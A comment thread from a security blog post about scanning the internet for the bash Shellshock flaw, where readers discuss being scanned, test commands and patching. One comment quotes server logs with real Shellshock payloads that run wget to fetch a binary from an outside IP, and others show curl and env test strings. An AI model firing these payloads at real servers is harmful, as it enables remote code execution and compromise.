tag:blogger.com,1999:blog-37798047.post3262625516357941756..comments2024-01-16T05:48:33.523-05:00Comments on Errata Security: Bash 'shellshock' scan of the InternetDavid Maynorhttp://www.blogger.com/profile/09921229607193067441noreply@blogger.comBlogger58125tag:blogger.com,1999:blog-37798047.post-50744318108113303022020-11-09T19:41:06.427-05:002020-11-09T19:41:06.427-05:00This comment has been removed by a blog administrator.felisha greenhttps://www.blogger.com/profile/04448582896725355815noreply@blogger.comtag:blogger.com,1999:blog-37798047.post-91367553478666329742020-11-09T19:40:42.637-05:002020-11-09T19:40:42.637-05:00This comment has been removed by a blog administrator.felisha greenhttps://www.blogger.com/profile/04448582896725355815noreply@blogger.comtag:blogger.com,1999:blog-37798047.post-51669257886156301752020-10-22T04:02:49.353-04:002020-10-22T04:02:49.353-04:00This comment has been removed by a blog administrator.Arpan Jhahttps://www.blogger.com/profile/09735477953647638969noreply@blogger.comtag:blogger.com,1999:blog-37798047.post-26845030483966655712020-07-27T07:45:31.997-04:002020-07-27T07:45:31.997-04:00This comment has been removed by a blog administrator.bhanuhttps://www.blogger.com/profile/05143270804313741246noreply@blogger.comtag:blogger.com,1999:blog-37798047.post-91968141191520077292014-10-01T09:21:10.048-04:002014-10-01T09:21:10.048-04:00Malware are really smart guys, they are now using ...Malware are really smart guys, they are now using something which looks more credible, :(<br /><br /><a href="http://javarevisited.blogspot.com" rel="nofollow">Javin</a>javin paulhttps://www.blogger.com/profile/15028902221295732276noreply@blogger.comtag:blogger.com,1999:blog-37798047.post-15057013899119471262014-09-30T18:56:15.319-04:002014-09-30T18:56:15.319-04:00Do not do a playful thing!
Very annoying!Do not do a playful thing!<br />Very annoying!Anonymoushttps://www.blogger.com/profile/05154241294186190613noreply@blogger.comtag:blogger.com,1999:blog-37798047.post-12317839660729940452014-09-28T22:49:12.527-04:002014-09-28T22:49:12.527-04:00I was scanned by your scanner back on the 24th.
2...I was scanned by your scanner back on the 24th.<br /><br />209.126.230.72 - - [24/Sep/2014:17:31:52 -0700] "GET / HTTP/1.0" 301 237 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"<br /><br />At the time, I was using an old Debian Lenny web server. I replaced it with a wheezy based system yesterday. It hasn't been online for 24 hours yet and...<br /><br />194.54.9.11 - - [28/Sep/2014:19:07:14 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 525 "-" "() { :;}; /bin/bash -c \"wget http://217.12.204.127/bin\""<br />194.54.9.11 - - [28/Sep/2014:19:07:34 -0700] "GET /var/www/html/admin.cgi HTTP/1.1" 301 543 "-" "() { :;}; /bin/bash -c \"wget http://217.12.204.127/bin\""<br />194.54.9.11 - - [28/Sep/2014:19:07:54 -0700] "GET /tmUnblock.cgi HTTP/1.1" 301 499 "-" "() { :;}; /bin/bash -c \"wget http://217.12.204.127/bin\""<br />194.54.9.11 - - [28/Sep/2014:19:08:14 -0700] "GET /var/www/cgi-bin/test-cgi HTTP/1.1" 301 521 "-" "() { :;}; /bin/bash -c \"wget http://217.12.204.127/bin\""<br />194.54.9.11 - - [28/Sep/2014:19:08:34 -0700] "GET /cgi-bin/hello HTTP/1.1" 301 499 "-" "() { :;}; /bin/bash -c \"wget http://217.12.204.127/bin\""<br />194.54.9.11 - - [28/Sep/2014:19:08:54 -0700] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 301 523 "-" "() { :;}; /bin/bash -c \"wget http://217.12.204.127/bin\""<br />194.54.9.11 - - [28/Sep/2014:19:09:14 -0700] "GET /cgi-mod/index.cgi HTTP/1.1" 301 507 "-" "() { :;}; /bin/bash -c \"wget http://217.12.204.127/bin\""<br />194.54.9.11 - - [28/Sep/2014:19:09:34 -0700] "GET /cgi-bin/test.cgi HTTP/1.1" 301 505 "-" "() { :;}; /bin/bash -c \"wget http://217.12.204.127/bin\""<br />194.54.9.11 - - [28/Sep/2014:19:09:54 -0700] "GET /cgi-bin-sdb/printenv HTTP/1.1" 301 513 "-" "() { :;}; /bin/bash -c \"wget http://217.12.204.127/bin\""<br /><br />So thanks for the heads up! I didn't have mod_cgi enabled but it's only a matter of time regardless.Anonymoushttps://www.blogger.com/profile/04013106292610848085noreply@blogger.comtag:blogger.com,1999:blog-37798047.post-37175986020646571682014-09-28T07:11:29.576-04:002014-09-28T07:11:29.576-04:00If it is not working with curl, it should be possi...If it is not working with curl, it should be possible to create a http request and send that with netcat. It will only work with CGI scripts unless anther web API also communicates with enviroment vars and runs a shell script afterwards, mod_php and similar things like tomcat will not do that. (I wonder why it happens with akamai, though)<br />Alexanderhttps://www.blogger.com/profile/10484879528786161061noreply@blogger.comtag:blogger.com,1999:blog-37798047.post-55204514138401464832014-09-27T23:36:44.436-04:002014-09-27T23:36:44.436-04:00Well if you noticed, that is then able to exploit ...Well if you noticed, that is then able to exploit anything irregardless of CGI existence. A random test of a local pool of Akamai servers sent me lots of ICMP replies. <br /><br />So the question would be for CURL folks, how to replicate this.<br /><br />Very scary. Especially now since folks are realizing this is not just a remote access exploit. It can also be used with many setuid programs (like vmware) and such to gain root access.<br /><br />10 out of 10 my ass. I call this a 20.<br /><br />Anonymoushttps://www.blogger.com/profile/15275289198141501929noreply@blogger.comtag:blogger.com,1999:blog-37798047.post-71974122637882204742014-09-27T18:47:42.937-04:002014-09-27T18:47:42.937-04:00@Ryan actually masscan does not use User-Agent, ra...@Ryan actually masscan does not use User-Agent, rather it puts the malicious string into the Host, Referer and Cookies header, not sure if that should make a difference.Alexanderhttps://www.blogger.com/profile/10484879528786161061noreply@blogger.comtag:blogger.com,1999:blog-37798047.post-36286786201924268292014-09-27T16:50:42.059-04:002014-09-27T16:50:42.059-04:00Thx @Alexnader for all the replies. I do understa...Thx @Alexnader for all the replies. I do understand that / is most likely not a CGI. But when I run masscan with the supplied config it finds hosts. I then picked one to test w/ curl and could not reproduce any of the same results.<br /><br />What is masscan doing different besides that curl is passing -A (user-agent).. ?Anonymoushttps://www.blogger.com/profile/15275289198141501929noreply@blogger.comtag:blogger.com,1999:blog-37798047.post-32754383924901376802014-09-27T10:04:43.526-04:002014-09-27T10:04:43.526-04:00Thanks Sean, re-hardy comment - you are correct Thanks Sean, re-hardy comment - you are correct Unknownhttps://www.blogger.com/profile/01460603907106799175noreply@blogger.comtag:blogger.com,1999:blog-37798047.post-72848719984907089342014-09-27T06:43:21.596-04:002014-09-27T06:43:21.596-04:00@all keep in mind that the user agent is completel...@all keep in mind that the user agent is completely arbitrary, anybody using the examples will use the URL from the blog post. We have seen the url in scans on some machines, but that doesn't mean that its really from the original script.<br /><br />@Chrstfer unless you have an IPS, the easiest way is to add something at the top of each php page (or what you are using) and match the header vars against the exploit string and log that (will not help for actual cgi exploits since it may happen before the script gets called)<br /><br />@zyphlar php is not directly exploitable since it doesn't set env vars and doesn't call bash, this is more likely a validation issue in your scripts<br /><br />@tillo that is not correct, CGI by itself is not exploitable and mod_php does not even use CGI<br /><br />@S whether it is illegal or not will not help you when your site goes down ...<br /><br />@Mrityunjay Ranjan bourne shell isn't (there is no bourne shell on linux or freebsd of course due to licensing), freebsd will usually have bash, but not as /bin/sh replacement<br /><br />@jah richie rails does not use CGI, so not directly, it may be due to other issues (unlikely)<br /><br />@SojuMaster the issue is present e.g. in cygwin, but unless you run a webserver, its unlikely that its exploitable<br /><br />@shawn updating bash requires root, the exploit will run as the local user (e.g. wwwrun)<br /><br />@Raoul Duke / might be a cgi script, but it usually isn't<br /><br />@Ryan Pavely accessing / path ist not likely to hit a CGIAlexanderhttps://www.blogger.com/profile/10484879528786161061noreply@blogger.comtag:blogger.com,1999:blog-37798047.post-85649732778439285592014-09-27T02:56:34.801-04:002014-09-27T02:56:34.801-04:00Very interesting. I can't get any tests to wo...Very interesting. I can't get any tests to work with curl. I fired up a sample of your masscan and shiazm I can get hundreds of hosts to ping me. But I can't get a single one to report break when I test w/ <br /><br />curl -i -X HEAD "http://$$$.$$$.$$$.$$$/" -A '() { :;}; echo "Warning: Server Vulnerable"'<br /><br />Any thoughts?Anonymoushttps://www.blogger.com/profile/15275289198141501929noreply@blogger.comtag:blogger.com,1999:blog-37798047.post-19517698423145063032014-09-27T02:04:35.435-04:002014-09-27T02:04:35.435-04:00Hello,
I don't understand how this exploit wo...Hello,<br /><br />I don't understand how this exploit works when just hitting the root path of the server. My understanding is it requires a CGI script that is written or calls bash to be exploitable. Is this from broken http servers?Anonymoushttps://www.blogger.com/profile/01160790862410165387noreply@blogger.comtag:blogger.com,1999:blog-37798047.post-2161245726185240012014-09-26T20:41:44.362-04:002014-09-26T20:41:44.362-04:00Regarding comments about earlier versions of Debia...Regarding comments about earlier versions of Debian and Ubuntu, the example given used /bin/sh rather than /bin/bash.<br /><br />env X="() { :;} ; echo busted" /bin/sh -c "echo stuff"<br /><br />Now try replace /bin/sh with /bin/bash<br /><br />On those distributions you'll find that by default /bin/sh is a symbolic link to dash, another shell which does not have the problem. This is helpful for CGI scripts that use #!/bin/sh but you'll still need to patch bash.<br /><br />For systems running older software distributions where a patch may not be available, the instructions at the following link on how to compile an updated and patched bash might be useful:<br /><br />https://gist.github.com/mattwhite/86de50d30134129e44efSean Holdsworthhttps://www.blogger.com/profile/13461324845621750447noreply@blogger.comtag:blogger.com,1999:blog-37798047.post-46378710957528525492014-09-26T14:12:13.877-04:002014-09-26T14:12:13.877-04:00Does this exploit affect Window boxes that have Ba...Does this exploit affect Window boxes that have Bash installed? i.e. CA Spectrum in a Windows Environment.<br /><br />ThanksSojuMasterhttps://www.blogger.com/profile/11115971855513024697noreply@blogger.comtag:blogger.com,1999:blog-37798047.post-4847836670753482402014-09-26T12:12:01.644-04:002014-09-26T12:12:01.644-04:00I would guess that you're going to see a log o...I would guess that you're going to see a log of vulnerable machines, since you started your scan the day the bug was announced. You scanned my servers about 12 hours before I patched them.Anonymoushttps://www.blogger.com/profile/08087938517140047677noreply@blogger.comtag:blogger.com,1999:blog-37798047.post-60176042108704906702014-09-26T11:14:01.270-04:002014-09-26T11:14:01.270-04:00You scanned me at 2014-09-25
-5:41:55 UTC. Path ...You scanned me at 2014-09-25 <br />-5:41:55 UTC. Path was not applied at that time but:<br /> * only a redirect at that web request you made<br /> * outbound network activity is blocked.<br /><br />Patches applied now.Richardhttps://www.blogger.com/profile/04202765987919071543noreply@blogger.comtag:blogger.com,1999:blog-37798047.post-63176164865351758642014-09-26T10:46:58.546-04:002014-09-26T10:46:58.546-04:00Got scanned by your scanner, but we were already p...Got scanned by your scanner, but we were already patched, so you never saw our response.Jason Roysdonhttps://www.blogger.com/profile/18156520109327941478noreply@blogger.comtag:blogger.com,1999:blog-37798047.post-73736942273152835832014-09-26T09:07:50.211-04:002014-09-26T09:07:50.211-04:00Be careful - You have your public IP available on...Be careful - You have your public IP available on the internet with potentially a listing of vulnerable Shellshock systems. <br /><br />You might be the next target.Anonymoushttps://www.blogger.com/profile/18284962546433574919noreply@blogger.comtag:blogger.com,1999:blog-37798047.post-43156416016242091102014-09-26T06:20:10.713-04:002014-09-26T06:20:10.713-04:00One Silly question:
How can i scan any remote ser...One Silly question:<br /><br />How can i scan any remote server for shellshock bug. Step by step guidance will be fine.<br /><br />I need to do it for ethical purposes.Shekhar Sumanhttps://www.blogger.com/profile/02651758973102120332noreply@blogger.comtag:blogger.com,1999:blog-37798047.post-83143778377144395072014-09-26T05:22:47.025-04:002014-09-26T05:22:47.025-04:00I am running ubuntu hardy, yeah I know its old, bu...I am running ubuntu hardy, yeah I know its old, but ...<br /><br />bash --version<br />GNU bash, version 3.2.39(1)-release (i486-pc-linux-gnu)<br />Copyright (C) 2007 Free Software Foundation, Inc.<br />mwest@lenovo2:~$ env X="() { :;} ; echo busted" /bin/sh -c "echo stuff"<br />stuff<br /><br />Interesting, so not all bash versions up to 4.3 are vulnerable it would seem.Unknownhttps://www.blogger.com/profile/01460603907106799175noreply@blogger.comtag:blogger.com,1999:blog-37798047.post-15862095932804866162014-09-26T02:13:07.812-04:002014-09-26T02:13:07.812-04:00I got scanned too! 25SEP2014 051051 and 071817 UTC...I got scanned too! 25SEP2014 051051 and 071817 UTC +0800.abrahamdslhttps://www.blogger.com/profile/14204220919255901178noreply@blogger.comtag:blogger.com,1999:blog-37798047.post-82863732469503641442014-09-25T23:14:18.814-04:002014-09-25T23:14:18.814-04:00I tried to modify code of masscan but it didnt com...I tried to modify code of masscan but it didnt compile well. Can you please code updated with functions to simulate this test (what you have done in the post)?rochahttps://www.blogger.com/profile/09265537177702812987noreply@blogger.com